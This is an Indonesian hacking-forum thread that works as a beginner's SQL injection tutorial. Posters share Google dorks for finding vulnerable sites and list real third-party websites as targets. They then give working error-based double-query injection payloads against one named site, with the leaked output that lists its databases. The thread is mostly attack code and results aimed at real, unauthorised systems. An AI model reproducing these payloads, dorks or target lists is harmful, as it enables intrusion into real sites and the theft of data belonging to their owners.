[Tutor] SQL Injection For Newbie (Share Di Mari)

[ketek]

(12-29-2011 10:00 PM)eidelweiss Wrote:  om bisa di jelasin nggak pada bagian ini

Quote:sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :

Code:

user_account = 0x757365725f6163636f756e74

kenapa harus di ubah or di hex terlebih dahulu ? kenapa gk lgsg aja atau klw pun harus di encrpyt kenapa harus dalam bentuk hexa kenapa nggak md5 base64 r00t13 or sha-1 or yg lain ?

Code:

table_name= 0x757365725f6163636f756e74--

ane bantu jawab ya..
disitu pake hex, mungkin karena tanda quote (') di escape menjadi \'
jadi kita tidak bisa gunakan sebagai nama table
kalau seandainya tidak di escape, maka kita bisa langsung gunakan

Code:

table_name = 'user_account'--

selain dirubah ke bentuk hex, kita bisa juga gunakan fungsi CHAR()
contoh

Code:

table_name=char(117,115,101,114,95,97,99,99,111,117,110,116)--

[cangcimen]

(12-29-2011 11:32 PM)ketek Wrote:  ane bantu jawab ya..
disitu pake hex, mungkin karena tanda quote (') di escape menjadi \'
jadi kita tidak bisa gunakan sebagai nama table
kalau seandainya tidak di escape, maka kita bisa langsung gunakan

Code:

table_name = 'user_account'--

selain dirubah ke bentuk hex, kita bisa juga gunakan fungsi CHAR()
contoh

Code:

table_name=char(117,115,101,114,95,97,99,99,111,117,110,116)--

makasih banyak om ketek udah bantu jawab,, ane lagi pusing ini buat ngasih jawaban dari om edelwies maklum newbie galau
tapi nnti ane usahakan jawab om sekarang lagi

[Caster.fm]

Code:

www.canseburesort.co.id

nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15

ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula

[tabun]

(12-30-2011 01:51 AM)mendung Wrote:  

Code:

www.canseburesort.co.id

nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15

ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula

klo 15 itu id dari beritanya omz..
1 = berita 1
2 = berita 2
dst..

[cangcimen]

(12-30-2011 01:51 AM)mendung Wrote:  

Code:

www.canseburesort.co.id

nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15

ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula

ane dapet target ini karena temen ane ada yang kerja disana
sebenernya bisa juga pencarian informasi web pake google dork (kalo ngga salah) kalo emang pertanyaan dari ente

Code:

nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

contohnya

Code:

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()

15 = id_berita (itu artinya nomer halaman berita om, dari websitenya ) dan kebetulan ada vuln di sana

[CyberKaze]

om ketek , eidelweiss , cangcimen , tabun

kalo misal yg keluar

Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346

contohnya di web :

http://www.gabbr.com/thread.php?id=88
http://svitmoto.com/news.php?id=16
http://www.stmik-time.ac.id/
http://aritaglobal.co.id/products.php?idcat=1

itu digimanain omz ? kalo dikasih single mark (') atau perintah order by juga yg keluar sama aja omz.

1 lagi omz di web ini http://www.capsweb.org/content.php?id=57
kalo di kasih order by 17-- itu kan "Unknown column '17' in 'order clause'"

nah berarti jadinya :
http://www.capsweb.org/content.php?id=57 order by 16--

nah nanti nya pas perintah union all select itu angkanya gimana ?
apakah 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 atau 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 atau gimana ? soalnya ane coba yg kya gitu ga keluar apa" om ..

mohon penjelasannya

[cangcimen]

(01-01-2012 10:43 PM)CyberKaze Wrote:  

Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346

contohnya di web :

http://www.gabbr.com/thread.php?id=88
http://svitmoto.com/news.php?id=16
http://www.stmik-time.ac.id/
http://aritaglobal.co.id/products.php?idcat=1

itu digimanain omz ? kalo dikasih single mark (') atau perintah order by juga yg keluar sama aja omz.

1 lagi omz di web ini http://www.capsweb.org/content.php?id=57
kalo di kasih order by 17-- itu kan "Unknown column '17' in 'order clause'"

nah berarti jadinya :
http://www.capsweb.org/content.php?id=57 order by 16--

nah nanti nya pas perintah union all select itu angkanya gimana ?
apakah 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 atau 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 atau gimana ? soalnya ane coba yg kya gitu ga keluar apa" om ..

mohon penjelasannya

cara ente udah bener gan, sebenernya website yang agan maksud ini bisa kita inject dengan double query
kenapa demikan?... karena ketika ane coba dengan

Code:

id=57 and 1=1 ------->true
id=57 and 1=2 ---------> false

ini asumsi ane pertama dan ternyata ane hoki mungkin ini bisa dibilang error based (tapi ane ngga yakin, mungkin momod yang bisa kasih tau)
kenapa ane berfikir itu vuln terhadap double query, karena ane pernah dapet yang kaya gituan
sekarang coba kita cermati baik2 query dibawah

Code:

id=57 and(select 1 FROM(select count(*),concat((select (select concat([color=#FF4500]database[/color]())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Spoiler:

hasil dari query tersebut adalah untuk melihat nama database! dan ternyata nama database tidak keluar, karena jumlah dari database lebih dari satu (kalo salah tolong di bilangin ya om).
sekarang coba kita ganti database jadi seperti berikut:

Code:

version()
user()
@@hostname
datadir()

maka berturut-turut akan jadi seperti gambar dibawah ini

Spoiler:

okeh lanjut, di atas ane udah singgung tentang database, sekarang kita pengen cek ada berapa nama database sih?

Code:

id=57 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)

Spoiler:

kita dapet pesan

Code:

Duplicate entry '~'17'~1' for key 'group_key'

itu artinya ada 17 nama database

sekarang kita pengen tau nama databasenya apa aja:

Code:

and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT [color=#FF4500]0[/color],1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

ini kita lakukan satu persatu, di atas angka 0 dan akan keluar seperti berikut

Spoiler:

Code:

Duplicate entry '~'information_schema'~1' for key 'group_key'

itu database yang pertama, untuk melihat database selanjutnya tinggal ente ganti aja yang 0 menjadi 1 atau 2 s/d 17

demikian dari apa yang bisa ane bantu om,,
ente bisa cari nama tabel dan nama kolom sendiri, mungkin ente bisa explore lagi dari contoh ane yang dia atas..

maaf kalo penjelasan ane ngawur atau ngaco,, (newbie)
referensi

Code:

[url]http://hacksafe.blogspot.com/2010/10/quick-dirty-mysql-error-based-blind.html[/url]

[nenjun]

kalau pake hp gimana itu...pake opmin?..ko ga bisa bisa...
aku bingung masta..

[g4t4n4]

ane pake hp teruz

[cangcimen]

(01-03-2012 03:50 PM)nenjun Wrote:  kalau pake hp gimana itu...pake opmin?..ko ga bisa bisa...
aku bingung masta..

itu bisa kali om,,
emang handphone ente udah suport sama opmin??